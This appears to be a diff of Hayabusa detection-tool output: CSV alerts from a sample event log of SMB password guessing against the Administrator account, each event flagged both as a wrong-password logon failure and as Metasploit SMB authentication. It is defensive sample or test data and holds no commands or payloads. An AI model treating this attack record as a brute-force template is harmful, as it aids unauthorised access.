+2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCfwHs2gVGiRc3Fy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 67TcwQfTxgTtQvCU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: imnSPKAKYzrCKSUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mMNbdjiXNUY0gTfB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zOAH0gjfs8JcXSMO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TnnB4KPBiDvKMsUL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aZRgpa5riqIEWhQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BBL4nrs7f6cjlfsT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fgDupzqipe5jK0r5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5yPcTOWPuN8efJtl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dszb6s0w6glvSkSw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ynu936pVVAuDUGT5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c55o3Dca2tiUVwb2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tnDmp2KK02LyJ7Xm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRUKrHDAmgEPcjQw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PCGKDvPhzg6BlsuU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OU28biGLJkFmB117  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 029LphuWcoo9S2hL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ItIROqP2wyzLJa9s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XngGun3HYopTkcrA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c91Qz5QNUczcm7m6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7nyWJJJhDiqnf1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bnj7hAp20gZE9FCe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FydQjBxO7XninU5Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3P8InIzyD86BXr1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wvKGa3A3qw7s0cZX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QTY7tRVEMjXZXFyH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m4Ij1NSYGYbq4PxS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 47fOxZAYhjxLzEoU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aGxXaNNChVScbHe6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jTcVeB8f2Rs3Bldo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeSnUlIbuDVNffey  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eXIM4tWru1x0AahJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m2pBLn6aO8L4kiH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EG5daDsgTMZsNg0T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3V8z6j7GLO3ywBXc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AsezMvhUNedLNqg4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h16AvUVZG8qch7LC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PB5xe3Aieya8N3IU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ezGXIhYrkk2Q9pe5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VSGIVhD6pO5z47DY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2vEjOhJW9G3aIfV0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hyvCpW3aOZqCOldu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyhS2wAAkfmZuLll  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0bEh0KTMbbFtsfck  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mw9u61efa06vYv6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
